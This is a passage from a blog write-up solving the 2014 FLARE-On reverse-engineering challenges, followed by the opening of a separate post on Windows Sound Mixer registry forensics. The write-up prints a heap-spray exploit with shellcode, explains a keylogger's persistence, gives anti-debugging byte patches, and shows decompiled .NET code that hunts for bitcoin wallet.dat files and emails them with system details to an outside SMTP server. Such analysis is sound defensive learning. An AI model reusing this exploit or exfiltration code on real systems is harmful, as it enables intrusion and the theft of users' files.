QCZabMzxQiD = zNfykyBKUZpJbYxaihofpbKLkIDcRxYZWhcohxhunRGf.substring(0, zNfykyBKUZpJbYxaihofpbKLkIDcRxYZWhcohxhunRGf.length-bGtvKT);
while(QCZabMzxQiD.length+bGtvKT < 0x40000) QCZabMzxQiD = QCZabMzxQiD+QCZabMzxQiD+Juphd;
FovEDIUWBLVcXkOWFAFtYRnPySjMblpAiQIpweE = new Array();

This is an ugly block of code (some lines were removed as they conflicted with Blogger formatting). There are a lot of long, randomly named variables, but that is of little consequence. Using Notepad++, I just find/replaced all of them to get code that looks like this:

var _VAR2_ = "";
for (_VAR3_ = 128; _VAR3_ >= 0; --_VAR3_) _VAR2_ += unescape("%ub32f%u3791");
_VAR4_ = _VAR2_ + __CODE__;
_VAR5_ = unescape("%ub32f%u3791");
_VAR6_ = 20;
_VAR7_ = _VAR6_ + _VAR4_.length
while (_VAR5_.length < _VAR7_) _VAR5_ += _VAR5_;
_VAR8_ = _VAR5_.substring(0, _VAR7_);
_VAR9_ = _VAR5_.substring(0, _VAR5_.length - _VAR7_);
while (_VAR9_.length + _VAR7_ < 0x40000) _VAR9_ = _VAR9_ + _VAR9_ + _VAR8_;
_VAR11_ = new Array();
for (_VAR3_ = 0; _VAR3_ < 100; _VAR3_++) _VAR11_[_VAR3_] = _VAR9_ + _VAR4_;
for (_VAR3_ = 142; _VAR3_ >= 0; --_VAR3_) _VAR1_ += unescape("%ub550%u0166");
_VAR12_ = _VAR1_.length + 20
while (_VAR1_.length < _VAR12_) _VAR1_ += _VAR1_;
_VAR13_ = _VAR1_.substring(0, _VAR12_);
_VAR10_ = _VAR1_.substring(0, _VAR1_.length - _VAR12_);
while (_VAR10_.length + _VAR12_ < 0x40000) _VAR10_ = _VAR10_ + _VAR10_ + _VAR13_;
_VAR11b_ = new Array();

for (_VAR3_ = 0; _VAR3_ < 125; _VAR3_++) _VAR11b_[_VAR3_] = _VAR10_ + _VAR1_;

Interesting ... but I don't care. This is all exploitation code; it doesn't do anything that we care about. Instead, we should look at the shellcode that is injected alongside the exploit:




var __CODE__ = unescape("%u72f9%u4649%u1525%u7f0d%u3d3c%ue084%ud62a%ue139%ua84a%u76b9%u9824%u7378%u7d71%u757f%u2076%u96d4%uba91%u1970%ub8f9%ue232%u467b%u9ba8%ufe01%uc7c6%ue3c1%u7e24%u437c%ue180%ub115%ub3b2%u4f66%u27b6%u9f3c
...



This is shellcode stored as escaped Unicode. Notably, when stored this way, the bytes are swapped: %u72f9 is actually the bytes 0xF9 0x72. If you just strip the %u and convert to hex, you have to swap every two bytes to get the correct values. Or, just use native JavaScript to do it for you. I did the former to get shellcode that had this:


Offset      0  1  2  3  4  5  6  7   8  9 10 11 12 13 14 15

00000000 F9 72 49 46 25 15 0D 7F 3C 3D 84 E0 2A D6 39 E1 ùrIF% <=„à*Ö9á
...
00000768 1C 03 F3 8B 14 8E 03 D3 52 33 FF 57 68 61 72 79 ó‹ Ž ÓR3ÿWhary
00000784 41 68 4C 69 62 72 68 4C 6F 61 64 54 53 FF D2 68 AhLibrhLoadTSÿÒh
00000800 33 32 01 01 66 89 7C 24 02 68 75 73 65 72 54 FF 32 f‰|$ huserTÿ
00000816 D0 68 6F 78 41 01 8B DF 88 5C 24 03 68 61 67 65 ÐhoxA ‹ßˆ\$ hage
00000832 42 68 4D 65 73 73 54 50 FF 54 24 2C 57 68 44 21 BhMessTPÿT$,WhD!
00000848 21 21 68 4F 57 4E 45 8B DC E8 00 00 00 00 8B 14 !!hOWNE‹Üè ‹
00000864 24 81 72 0B 16 A3 FB 32 68 79 CE BE 32 81 72 17 $ r £û2hyξ2 r
00000880 AE 45 CF 48 68 C1 2B E1 2B 81 72 23 10 36 9F D2 ®EÏHhÁ+á+ r# 6ŸÒ


Just with visual analysis, I see "LoadLibraryA" pop out, as well as "MessageBoxA" and "OWNED!!!".
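For reference, that %u-to-bytes conversion is easy to script rather than do by hand. A minimal sketch (only the first few escaped words shown; the variable names are mine):

import re
import struct

js = "%u72f9%u4649%u1525%u7f0d"   # truncated sample of the escaped data
words = re.findall(r"%u([0-9a-fA-F]{4})", js)
# each %uXXXX escape is a little-endian 16-bit value, so %u72f9 becomes the bytes F9 72
shellcode = ''.join(struct.pack('<H', int(w, 16)) for w in words)
print shellcode.encode('hex')   # -> f972494625150d7f, matching the start of the dump above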

With this block of shellcode, I use shellcode2exe.py to wrap it into an executable and launch it in Immunity Debugger. Notably, during execution, out-of-sequence DWORDs are XOR'd to form the parts of an email address that assembles to: wa1ch.d3m.spl01ts@flare-on.com


This one took a good while longer than the previous ones. At 2348, almost two hours later, after going down various rabbit holes in the exploit, fixing the PDF, and putting my kids to sleep very late, I sent off the email... then promptly went to bed.

Challenge 5


Challenge #5 was waiting in my inbox when I woke up early the next morning, another executable:


File Name       : 5get_it
File Size : 101,376 bytes
MD5 : eb4a4861a5d641402551dcfd6f2a4bfa
SHA1 : d0716637a979d071f4c0e32e80393f3a55652aed
Fuzzy : 1536:eHc4Y6O5rgKXNNMnwughXT4m1pKnm3dBdshDr45oQPPGRPTJT:qYv5M+NMwtTzCWPqh45eRPTJT
Import Hash : a609e70126618238af613915d25abb82
Compiled Time : Thu Jul 03 22:01:47 2014 UTC
PE Sections (4) : Name Size MD5
.text 75,776 744af5711d3ed547a1a607631e9d41ea
.rdata 10,752 2d438c10143d8d363256b109982a281c
.data 9,728 abb223f71d55ef5c6b378cd9d968f5e7
.reloc 4,096 19b1fca9179c9b60507bd0d0dce88d36
Magic : PE32 executable for MS Windows (DLL) (GUI) Intel 80386 32-bit
SignSrch : offset num description [bits.endian.size]
1000abca 1299 classical random incrementer 0x343FD 0x269EC3 [32.le.8&]
10016482 2545 anti-debug: IsDebuggerPresent [..17]


Notably, this file was flagged by 'file' as a DLL, but failed all of my peutils DLL scraping routines because:



AttributeError: PE instance has no attribute 'DIRECTORY_ENTRY_EXPORT'


I load it into IDA Pro and start with DLLMain():





By some basic analysis, the sample first determines if HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost is set and, if not, copies itself to C:\Windows\System32\svchost.dll and entrenches in the registry there as "c:\windows\system32\rundll32.exe c:\windows\system32\svchost.dll". Overall, pretty common functionality for a lot of malware.



Following the code flow, I see a clear sign of a very basic keylogger. There is an API call to passively retrieve keystrokes from the buffer (GetAsyncKeyState()) and then a large switch statement for most keys on the keyboard:







By following one of these routines, for the letter A, I see a lot of global boolean values being checked to eventually toggle a new one on or off. Just through deduction, I realize that the booleans being set to true (1) are only set within that respective keystroke and are checked in others, suggesting that some keys need to be typed before others for that key to be toggled on.





In essence, the program is keylogging and looking for a particular word or phrase to be typed in. With this known, I go about labeling each and every subroutine, and then each respective boolean value. This helps explain the labels in the screenshot above, but also showed that in many keystrokes there are no actions taken, suggesting that the malware doesn't care if they are pressed. After a series of naming, it definitely shows that there's a limited set of keys being logged:




With those set, you could attempt to trace through the keystrokes like a backwards choose-your-own-adventure series (because I always wanted to see how to get to the goriest deaths), but there was an easier way that didn't require running the malware. When you create global variables and constants in C, the compiler will group them together, so by double-clicking on any global boolean you can see it in the context of the rest of the global values. I ignored this at first, thinking that the author would obfuscate the sequence of values so that they wouldn't read as an email ... but I was wrong. They were in direct sequence and spelled out the email address (l0ggingdoturdot...):




When initially pulling out the email I noticed one issue. The email was l`gging.Ur.5tr0ke5. There shouldn't be an apostrophe there, so I checked my code again. When I started xref'ing the values to double check I realized that the apostrophe keystroke was used to set the letter "0". 






Odd... regardless, I change the character and get the legitimate email: l0gging.Ur.5tr0ke5@flare-on.com



The email was sent off that morning of 25 July at 0923 after spending about 2 hours on it. Then, I went to work.




Challenge 6





At this point I notified my coworkers that I was starting on the challenge and learned that two of them were already on #6. However, we maintained the professional courtesy of not sharing with each other :)



They warned me that #6 was said to be the most difficult challenge of the entire series, with every previous challenge there just to separate the chaff. And they weren't wrong.


File Name       : e7bc5d2c0cf4480348f5504196561297
File Size       : 1,221,064 bytes
MD5             : e7bc5d2c0cf4480348f5504196561297
SHA1            : 7ff95920877af815c4b33da9a4f0c942fe0907d6
Fuzzy           : 12288:AAgOYrVfqiJwPy4Yj7/fb358YegLauCC9yJawoguxK1wT2syIvj90NK8:/cVfqiJUyL73b358YegxCsKKwI7CJ
Magic           : ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, for GNU/Linux 2.6.24, stripped
SignSrch        : offset   num  description [bits.endian.size]
                  000f7945 2417 MBC2 [32.le.248&]
                  000f8320 173  CRC-1 [crc8.0x01 le rev int_min.256]
                  000f8320 171  CRC-1 [crc8.0x01 lenorev int_min.256]
                  000f863c 2418 MBC2 [32.be.248&]
                  000f90d4 3051 compression algorithm seen in the game DreamKiller [32.be.12&]


Nice! A 64-bit Linux ELF. I've had experience with only a handful of ELFs, previously doing a few Phalanx, Tiny Shell, and ChikDOS samples, plus a difficult sample for my RSA interview. The 64-bit format proved a bit of a hurdle, as it meant I couldn't decompile any of the functions (at the time I was using IDA 6.5; 6.6, which added that feature, had only just been released).

I first attempted a static analysis of the file and gave up within a few hours. There were 2400 routines, with a majority appearing similar to the one shown below:



This would require debugging to get anywhere, and I am not particularly fond of IDA Pro's debugger. I'm quite fond of Immunity/Olly and right clicking on arbitrary values to show them in hex, and to see comparisons live with actual address names instead of "data[ebp+410]", but I digress. There is no Immunity/Olly available for Linux, but there is Evan's Debugger (EDB). That afternoon I sat down and ran through the sample.

The first thing to note was that it required command line arguments, but didn't tell you how many or what they were. 



At this point, I decide to force myself to go the Linux route. Both coworkers were comfortable with IDA, and one had already created a set of FLIRT signatures to identify all of the statically linked routines. After an hour of learning to do the same he noted that there were very few routines resolved, so I went back to just forcing my way through. Hitting too many issues with EDB, with just not enough comfort with it, I switched back to IDA Pro.

I used the remote debugger within IDA Pro to run the sample. I created a new Xubuntu VM and placed the malware sample and the IDA remote debugger app on the desktop, networked the two VMs together, and kicked it off.

In debugging to determine how many arguments I should have, I set multiple breakpoints along different routes to see which number of args would take me the farthest. As no calls were documented (via the earlier IDA FLIRT sigs), they had to be identified by hand. That means determining what TerminateProcess(), printf(), strcmp(), CreateFileA(), etc. are by sight. This took a long time but paid off. After spending hours following the flow of logic to see where it would crash, I hit upon the key to the first argument:

In the code above the sample checks the length of the first argument to make sure it's 10 bytes. It then XOR's the entire argument by 0x56 and checks the result against "bngcg`debd". Failing either causes a print of "bad" and TerminateProcess(). XOR'ing that value shows that arg1 must be set to "4815162342".
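A quick one-liner confirms the recovered argument:

# XOR the comparison string back by 0x56 to recover arg1
check = "bngcg`debd"
print ''.join(chr(ord(c) ^ 0x56) for c in check)   # -> 4815162342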
I went back and ran the sample with that as the argument. Good news: no more "bad"! Bad news... it "froze".
This led to another issue with this sample. It relies heavily upon syscall() for many of its functions, sort of a consolidated API where the behavior depends on the value you pass in, similar to network RPC. However, it took some time to realize that 64-bit Linux syscall numbers are not the same as the 32-bit ones. I eventually used this site as a resource: Linux System Call Table for x86_64

The sample uses syscalls to throw a few wrenches at you. First, it makes a call to sys_ptrace to check for a debugger. It then later (after verifying the first arg) calls sys_nanosleep to enter deep sleeps before further execution.
The direct way around this was to just patch the bytes with a hex editor in the sample and reload the binary.

PATCH syscall 101 (ptrace?)
OLD: E8 9A 50 05 00 48 C1 E8 3F 84 C0 74 14
NEW: E8 9A 50 05 00 48 C1 E8 3F 84 C0 EB 14

PATCH syscall 35 (sleep?)
.text:0000000000473D49 B8 23 00 00 00 mov eax, 35 ; sys nanosleep
.text:0000000000473D4E 0F 05 syscall
OLD: B8 23 00 00 00 0F 05
NEW: 90 90 90 90 90 90 90

PATCH syscall 35 (sleep?)
.text:0000000000473D6A B8 23 00 00 00 mov eax, 35 ; sys nanosleep
.text:0000000000473D6F 0F 05 syscall
OLD: B8 23 00 00 00 0F 05
NEW: 90 90 90 90 90 90 90


After passing this check the sample returned up to the main function and went down a large rabbit hole of subroutines that all looked similar to the beginning. I stepped through most of it, trying to follow the flow of data. After a few dozen were called I noticed a block of what looked like Base64 data being written to memory. However, it was written out of sequence with large portions of null data mixed in.


Let me stop to mention that at this point many hours have gone by. I had started on Friday afternoon, and this is now Sunday evening. This sample took a lot of time to debug properly, and careful attention to where breakpoints should be placed. I neglected to do much of that, so there were many hours of wasted work.

It is now Monday. Eventually, I see an anonymous-looking subroutine call another, which called another, and another, all of which caused the program to stop if I stepped over them. At this point I was no longer following the data, but sat hitting step until I saw interesting instructions... and then I saw call rdx. Too late, I had F8'd over it and the program stopped.

The day is growing long and I grow tired. I restarted and got to that point again and looked around. The large block of Base64 data was completed and was decoded in memory. The sample then called into that code for more instructions. Following this, I was disheartened to see the results: over 30 individual encoding routines, each checking a respective character of command line arg2.


I quickly write up decoders for the first few in Python but then hit a limit with type casting in Python. C will let you do operations like (0x40 ^ 0xBB + 0xF1) and keep the result within a single byte. Python won't easily. Frustrated at the level of effort still ahead of me, I crash and go to bed.

However, I instead lay in bed staring at the ceiling thinking this over, then quickly get up and run back to the basement. There was an incredibly easy way to do this! But... I didn't find it. I found a harder way, but still easier than re-writing each routine. As another solution noted, you could just start with a null byte and let the program do the math for you to get the byte. Too tired to even spin up my VMs, I just ran Ollydbg from my host, tapped into random memory space, and hand-transcribed the operations in reverse:


Now THAT is ghetto reversing ... Slowly the letters worked their way out and, at 00:26 on 29 July, I had the answer of l1nhax.hurt.u5.a1l@flare-on.com. Four and a half days of analysis ... I submit and crash in bed.


Challenge 7


This is it, the final challenge. I had two days left to wrap this up, and I quickly woke up to jump at it.

File Name       : a954bde7092791b06385a9617ba85415
File Size : 195,584 bytes
MD5 : a954bde7092791b06385a9617ba85415
SHA1 : edb86bfa4d9272bac264dacc68ba1e8fa8878793
Fuzzy : 3072:8biJ9nQgBfhfyBmr1UrjqvYdCVMi+z8HUrmv0UPBn/sNAc6n0OcGh6IVlo:8kQg7Amr1UfrCWZ881UPpsGY7GfP
Import Hash : e1a627890bc24cc28061ac3baf4662fe
Compiled Time : Sun Jul 06 22:05:19 2014 UTC
PE Sections (5) : Name Size MD5
.text 52,224 ab6c9a52eaf1b3b59c115abc63f1a80b
.rdata 12,800 40b19e50cb9c3dbc60d3c243823de929
.data 123,392 322a18069e4bc7af15c1f7c025a61bbc
.rsrc 512 c9363b5b6ba262c2acc3d14a8d930c07
.reloc 5,632 ced1665f50bf5ac984eb759ef096f05f
Magic : PE32 executable for MS Windows (console) Intel 80386 32-bit
SignSrch : offset num description [bits.endian.size]
00410af0 2545 anti-debug: IsDebuggerPresent [..17]
004321b4 3032 PADDINGXXPADDING [..16]


Nothing out of the ordinary. I open the sample expecting horrendous amounts of encoding... and was surprised. The malware reversed very easily; there was a limited number of subroutines, the code was clean, and everything made sense. The challenge was a bit more insidious.

Inside the executable is an encoded executable; you can see it sitting there. As the program runs it performs various checks against the system, such as "is the system 64-bit?". If the check passes, it XOR-decodes the data with one key. If it fails, it uses another key.

After a dozen checks, you have an executable that you can run. The problem is determining which code path will get you the final executable.

The obvious shortcuts were eliminated: the "MZ" and "PE" bytes used other characters in the encoded file, and you have to supply those on the command line, so that took out the ability to easily search for 0x4d5a00. I went straight to work documenting all of the keys and routines and writing a brute forcer that would try every possible key combination against the executable until it produced a clean file. I'll admit that many of the checks were interesting, and followed core connectivity/verification checks that malware likes to use:


There were slight differences in how many of the functions performed their XOR'ing. Some were just to accommodate two keys in the same string. At the end they could've all been the same, but I tried to replicate them as I saw them, and wrote the following brute forcer:

# @bbaskin
import itertools

def x(data, key, keylen):
    newdata = ''
    for i in range(0, len(data)):
        newdata += chr(ord(data[i]) ^ ord(key[i % keylen]))
    return newdata

def x2(data, key, keylen):
    newdata = ''
    for i in range(0, len(data)):
        newdata += chr(ord(data[i]) ^ ord(key[i & keylen]))
    return newdata

def x3(data, key, num1, num2):
    newdata = ''
    for i in range(0, len(data)):
        newdata += chr(ord(data[i]) ^ ord(key[(i & num1) + num2]))
    return newdata

def x4(data, key, num1, num2):
    newdata = ''
    for i in range(0, len(data)):
        newdata += chr(ord(data[i]) ^ ord(key[(i % num1) + num2]))
    return newdata


def CheckPEB():
    global data
    if run[0]:
        data = x(data, "UNACCEPTABLE!", 13)
    else:
        data = x(data, "omglob", 6)

def CheckSIDT():
    global data
    if run[1]:
        data = x(data, "you're so bad", 13)
    else:
        data = x(data, "you're so good", 14)

def CheckVMXh():
    global data
    if run[2]:
        data = x(data, "\x01", 1)
    else:
        data = x(data, "f", 1)

def CheckLastError():
    global data
    if run[3]:
        data = x(data, "I'm gonna sandbox your face", 27)
    else:
        data = x(data, "Sandboxes are fun to play in", 28)

def CheckDebugger():
    global data
    if run[4]:
        data = x(data, "Such fire. Much burn. Wow.", 26)
    else:
        data = x(data, "I can haz decode?", 17)

def Check64Bit():
    global data
    if run[5]:
        data = x(data, "Feel the sting of the Monarch!", 30)
    else:
        data = x(data, "\x09\x00\x00\x01", 4)

def CheckFriday():
    global data
    if run[6]:
        data = x(data, "! 50 1337", 9)
    else:
        data = x2(data, "1337", 3)

def CheckFNBackDoge():
    global data
    if run[7]:
        data = x(data, "MATH IS HARDLETS GO SHOPPING", 12)
    else:
        data = x3(data, "MATH IS HARDLETS GO SHOPPING", 15, 12)

def CheckInternetAccess():
    global data
    if run[8]:
        data = x2(data, "SHOPPING IS HARDLETS GO MATH", 15)
    else:
        data = x4(data, "SHOPPING IS HARDLETS GO MATH", 12, 16)

def Check5PM():
    global data
    if run[9]:
        data = x2(data, "\x07w", 1)
    else:
        data = x(data, "\x01\x02\x03\x05\x00\x78\x30\x38\x0D", 9)

def CheckDNSROOT():
    global data
    if run[10]:
        IP = "192.203.230.10"
        newdata = ''
        for i in range(0, len(data)):
            pos = i % len(IP)
            newdata += chr(ord(data[i]) ^ ord(IP[pos]))
        data = newdata

def CheckTwitter():
    global data
    if run[11]:
        data = x(data, "jackRAT", 7)

def CheckDebugger2():
    global data
    if run[12]:
        data = x(data, "the final countdown", 19)
    else:
        data = x(data, "oh happy dayz", 13)

def XorPath():
    global data
    path = "backdoge.exe"
    data = x(data, path, 12)


def main():
    global data
    global run
    CheckPEB()
    CheckSIDT()
    CheckVMXh()
    CheckLastError()
    CheckDebugger()
    Check64Bit()
    CheckFriday()
    CheckFNBackDoge()
    CheckInternetAccess()
    Check5PM()
    CheckDNSROOT()
    CheckTwitter()
    CheckDebugger2()
    XorPath()


if __name__ == "__main__":
    global data
    global run
    fh = open('backdoge.exe', 'rb')
    fh.seek(0x113f8)
    data_back = fh.read(118272)
    fh.close()

    for run in itertools.product(range(2), repeat=13):
        fn = "E:\\Malware\\FLARE\\7\\out\\"
        for z in itertools.product(*[run]):
            fn += str(z[0])
        data = data_back
        main()
        if data[2] == "\x90" and data[3] == "\x00" and data[5] == "\x00" and data[6] == "\x00":
            print run, data[0:12].encode('hex')
            open(fn, 'wb').write(data)

It's not great code, and not fast, but it worked. Eventually. I wasted an entire day of effort on this because I mis-numbered the offsets and so was not getting any positive results. This caused me to go extremely in depth with the script, only to learn my mistake the next day. <face palm>

After a few minutes of (successful) running, an executable alerted:

E:\malware\FLARE\7>7_bruteforce.py
(0, 0, 0, 1, 1, 0, 1, 1, 1, 0, 1, 1, 1) feeb9000030000000400050e


After applying the "MZ" and "PE", it became a legitimate executable!


File Name : gratz.exe
File Size : 118,272 bytes
MD5 : 4f2b4cc03199553ff39d7e214a4ee8c6
SHA1 : 2a6fc52764451e8d937f2dc0464aa0ba809031f4
Fuzzy : 3072:Bt9rJyNXrCJsq18PG/i9SICdn8rMA+GJJLOFiUF1hSBSi/NgXf5wq:b9rJgbI8P597rMryL2nFiBSAePq
Import Hash : f34d5f2d4577ed6d9ceec516c1f5a744
Compiled Time : Sat Jul 05 22:58:43 2014 UTC
PE Sections (3) : Name Size MD5
.text 115,712 9c7b5b112287933a9dd532548895a3ac
.rsrc 1,536 b34dc44cc95a966d8d2df8a209f2ecf1
.reloc 512 aaa13a058c9ceffaaf68b401a847b37c
Magic : PE32 executable for MS Windows (GUI) Intel 80386 32-bit Mono/.Net assembly
.NET Version : 2.0.0.0

First, I execute it to see what happens:


I had seen this guy being spread around Twitter by others finishing up, so I knew I was close. Seeing the .NET 2.0 here, I load the sample up in .NET Reflector for analysis.

The main Form1 function contains no overtly weird data. There are no hidden buttons, but not all labels are accounted for in the output: there are seven labels (numbered 1 through 8, with 7 missing) and all are displayed except label 2. Label2.Text is never set in the form.

Let's start from the beginning and monitor the form creation. The form starts a new thread to call a routine called lulzors:



This routine sets Label2.text, the missing equation, by sending obfuscated data to lulz.decoder4. I use Reflector to browse to the lulz module and see a few bits of obfuscation:

public class lulz
{
    public void datwork()
    {
        object obj2 = ((("" + this.decoder1("(\x0014\x0018Z.\x0010\r\x0019\x0003\x001bVpAXAWAXAWAXAWAXAWAXAWAXAWAXAWAXAWAXAp")) + this.decoder2("9\t\n\x001b\x001d\x0006\fIT") + Environment.MachineName + "\n") + this.decoder3("&\x001a\t\x001e=\x001c\x0004\r\x0005\x0017II") + Environment.UserDomainName + "\n") + this.decoder1("9\x0006\t\bVU") + Environment.UserName + "\n";
        string info = string.Concat(new object[] { obj2, this.decoder2(";;I%\x0011\x001a\x001a\x001a\x001b\x0006SS"), Environment.OSVersion, "\n" });
        foreach (string str2 in Environment.GetLogicalDrives())
        {
            info = info + this.decoder3("7\x001b\x0005\x001a\x001cII") + str2 + "\n";
            this.yum(str2, this.decoder1("\x001b\x0014\0\x0016\t\x0001B\x001e\r\x0001"), ref info);
        }
        string str3 = "";
        foreach (IPAddress address in Dns.GetHostEntry(Dns.GetHostName()).AddressList)
        {
            if (address.AddressFamily == AddressFamily.InterNetwork)
            {
                str3 = address.ToString();
                break;
            }
        }
        info = info + this.decoder3(":9VL") + str3 + "\n\n";
        MailMessage message = new MailMessage();
        message.To.Add(this.decoder2("\x0015\x0004X]\x0010\t\x001d]\x0010\t\x001d\x00124\x000e\x0005\x0012\x0006\rD\x001c\x001aF\n\x001c\x0019"));
        message.Subject = this.decoder3(":N\x0001L\x0018S\n\x0003\x0001\t\x0006\x001d\t\x001e");
        message.From = new MailAddress(this.decoder1("\0\0\0\0,\x0013\0\x001b\x001e\x0010A\x0015\x0002[\x000f\x0015\x0001"));
        message.Body = info;
        new SmtpClient(this.decoder2("\a\x0005\x001d\x0003Z\x001b\f\x0010\x0001\x001a\f\0\x0011\x001a\x001f\x0016\x0006F\a\x0016\0")).Send(message);
    }

    public string decoder1(string encoded)
    {
        string str = "";
        string str2 = "lulz";
        for (int i = 0; i < encoded.Length; i++)
        {
            str = str + ((char)(encoded[i] ^ str2[i % str2.Length]));
        }
        return str;
    }

    public string decoder2(string encoded)
    {
        string str = "";
        string str2 = "this";
        for (int i = 0; i < encoded.Length; i++)
        {
            str = str + ((char)(encoded[i] ^ str2[i % str2.Length]));
        }
        return str;
    }

    public string decoder3(string encoded)
    {
        string str = "";
        string str2 = "silly";
        for (int i = 0; i < encoded.Length; i++)
        {
            str = str + ((char)(encoded[i] ^ str2[i % str2.Length]));
        }
        return str;
    }

    public string decoder4(string encoded)
    {
        string str = "";
        string str2 = this.decoder2("\x001b\x0005\x000eS\x001d\x001bI\a\x001c\x0001\x001aS\0\0\fS\x0006\r\b\x001fT\a\a\x0016K");
        for (int i = 0; i < encoded.Length; i++)
        {
            str = str + ((char)(encoded[i] ^ str2[i % str2.Length]));
        }
        return str;
    }

    public void yum(string folder, string name, ref string info)
    {
        try
        {
            foreach (string str in Directory.GetFiles(folder))
            {
                if (str.EndsWith(name))
                {
                    byte[] inArray = File.ReadAllBytes(str);
                    info = info + this.decoder3("=\x0006\x0001\x001fCS") + str + "\n";
                    info = info + Convert.ToBase64String(inArray) + "\n";
                }
            }
            foreach (string str2 in Directory.GetDirectories(folder))
            {
                this.yum(str2, name, ref info);
            }
        }
        catch (Exception exception)
        {
            Console.WriteLine(exception.Message);
        }
    }
}

The first thing I noticed was the creation of an email in datwork(), where obfuscated fields are used to create the recipient, subject, and body. We'll come back to that.

There are multiple "decoder" functions, each simply doing multi-byte XOR against static strings: lulz, this, silly, and an obfuscated value that resolves to. "omg is this the real one?". I recreated each in Python, decoded the values, and replaced them back into the source:

public class lulz
{
    public void datwork()
    {
        object obj2 = (("Dat Beacon:\n-----------------------------------\n" + "Machine: " + Environment.MachineName + "\n") + "UserDomain:" + Environment.UserDomainName + "\n") + "User: " + Environment.UserName + "\n";

        string info = string.Concat(new object[] { obj2, "OS Version: ", Environment.OSVersion, "\n" });
        foreach (string str2 in Environment.GetLogicalDrives())
        {
            info = info + "Drive: " + str2 + "\n";
            this.yum(str2, "wallet.dat", ref info);
        }
        string str3 = "";
        foreach (IPAddress address in Dns.GetHostEntry(Dns.GetHostName()).AddressList)
        {
            if (address.AddressFamily == AddressFamily.InterNetwork)
            {
                str3 = address.ToString();
                break;
            }
        }
        info = info + "IP: " + str3 + "\n\n";
        MailMessage message = new MailMessage();
        message.To.Add("al1.dat.data@flare-on.com");
        message.Subject = "I'm a computer";
        message.From = new MailAddress("lulz@flare-on.com");
        message.Body = info;
        new SmtpClient("smtp.secureserver.net").Send(message);
    }

    public void yum(string folder, string name, ref string info)
    {
        try
        {
            foreach (string str in Directory.GetFiles(folder))
            {
                if (str.EndsWith(name))
                {
                    byte[] inArray = File.ReadAllBytes(str);
                    info = info + "Noms: " + str + "\n";
                    info = info + Convert.ToBase64String(inArray) + "\n";
                }
            }
            foreach (string str2 in Directory.GetDirectories(folder))
            {
                this.yum(str2, name, ref info);
            }
        }
        catch (Exception exception)
        {
            Console.WriteLine(exception.Message);
        }
    }
}



Let me just say ... WTF?! This routine will build basic data about your system to email out but, more specifically, search all of your local hard drives for a bitcoin wallet. If found, the contents will be copied and emailed to FireEye. Maybe it's just to highlight the importance of running within a VM, or without Internet access, but ...


Anyhow, this is all secondary to the purpose of the file, which is to get the email address. And "al1.dat.data@flare-on.com" is not the correct one. Instead, we need to go back to the form and find the data being sent into decoder4(). Resolving it gives:

da7.f1are.finish.lin3@flare-on.com

That sounds like it! Beaten, and exhausted, I shoot the final email off at 1750 on 31 July, with just over an hour before my personal deadline. Two and a half days were spent on this last challenge. I receive my confirmation two minutes later and go open a bottle of whisky.


After a few days I received a follow-up email asking how I completed the last few challenges, which I replied to, and then received my award on 20 September, an RMO designating my finish order (0x83 or 131):



Thanks to FireEye and the FLARE team for a fun challenge! I had a lot of fun and constructive frustration in solving them. We all know this was a recruitment drive, but it was still fun :)

Thanks to my friend Dan Raygoza for some pep talks and advice to keep me from going too far down the wrong roads on #6 and #7. And to Nicolas Brulez who helped me understand that I was on the right road with finishing #7.

Thank you for reading, and I hope this helps anyone else in the field!

DJ Forensics: Analysis of Sound Mixer Artifacts

In many forensics examinations, including those of civil and criminal nature, there is an art to finding remnants of previously installed applications. Fearing detection, or assuming that an examination is forthcoming, many suspects attempt to remove unauthorized or suspicious applications from a system. Such attempts are usually unsuccessful and result only in additional hours of processing for forensics. But even with a clean uninstall there are traces left within the Windows registry that note such a program was installed.

The most popular of these is the Windows Shim Cache (a/k/a Application Compatibility Database, a/k/a AppCompatCache), a resource that can be used to catalog applications not natively compiled for newer Windows. It's also a resource that works great for finding APT-related malware running on a system, but not so much legitimate applications.

For a few months I've been playing with another repository of applications: the Windows Sound Mixer. Whenever an application requests the use of the Windows audio drivers, Windows will automatically register this application in the registry. This information is stored so that Windows can create per-application sound settings:



This was a resource I dismissed for a year. It existed only in Windows Vista and newer, it didn't catch any of the malware I threw at it, and it wasn't relevant to any of the Incident Response work I do**. Its importance came to me while working some cases, mixed in with my intrusion cases, where I had to examine systems owned by various hackers. One in particular involved tracking the use of alternative web browsers and discovering that the Sound Mixer had catalogued the use, and location, of Tor Browser launched from a TrueCrypt volume. Clear as day, the path even noted that it was a TrueCrypt volume based upon the Windows device name:

\Device\TrueCryptVolumeP\Tor\App\Firefox\firefox.exe

I learned that the registry keys were useful for such cases, but there has been no prior public discussion of the forensic use of this data.




** After some testing ideas from Michael Zeberlein, I determined that many RATs with audio capturing abilities do get flagged by the Sound Mixer. However, many only do so when the adversary actively engages that feature. This was tested with SpyGate and DarkComet.

Windows collects this data in the user's NTUSER.DAT registry hive as:

HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore

From this key are a series of sub-keys, one for each individual application stored. What we are really concerned about is the "(Default)" (REG_SZ) value stored for each sub-key. An example of this value is:

{0.0.0.00000000}.{e64c029e-480d-424c-a775-2fd663e1442f}|\Device\HarddiskVolume2\Program Files\VideoLAN\VLC\vlc.exe%b{00000000-0000-0000-0000-000000000000}

This value stores the path of the program, the sound device registered, and other assorted data:

  • {0.0.0.00000000}.{e64c029e-480d-424c-a775-2fd663e1442f}
  • \Device\HarddiskVolume2\Program Files\VideoLAN\VLC\vlc.exe
  • %b
  • {00000000-0000-0000-0000-000000000000}

The first value corresponds to the output audio device that the application can access. The second is the path to the application, followed by an unknown delimiter and, finally, a GUID referencing any audio input device (microphone) used by the application.
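Splitting that value into its pieces is straightforward; a quick sketch, treating '%b' purely as a delimiter since its meaning is unknown:

val = ("{0.0.0.00000000}.{e64c029e-480d-424c-a775-2fd663e1442f}|"
       "\\Device\\HarddiskVolume2\\Program Files\\VideoLAN\\VLC\\vlc.exe"
       "%b{00000000-0000-0000-0000-000000000000}")

render_guid, rest = val.split('|', 1)
app_path, capture_guid = rest.split('%b', 1)
print render_guid     # output (Render) device GUID
print app_path        # executable path, stored as a device path
print capture_guid    # input (Capture) device GUID, all zeroes if none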

Referencing Output Devices


For the vast majority of applications, the GUID for the output device will be for the generic "Speakers" device. These values can be correlated to multiple places in the registry. The easiest would be to search the user's output devices in HKEY_CURRENT_USER\Software\Microsoft\Speech\AudioOutput\TokenEnums\MMAudioOut; however, that key only contains entries for current hardware and for devices the user has access to.

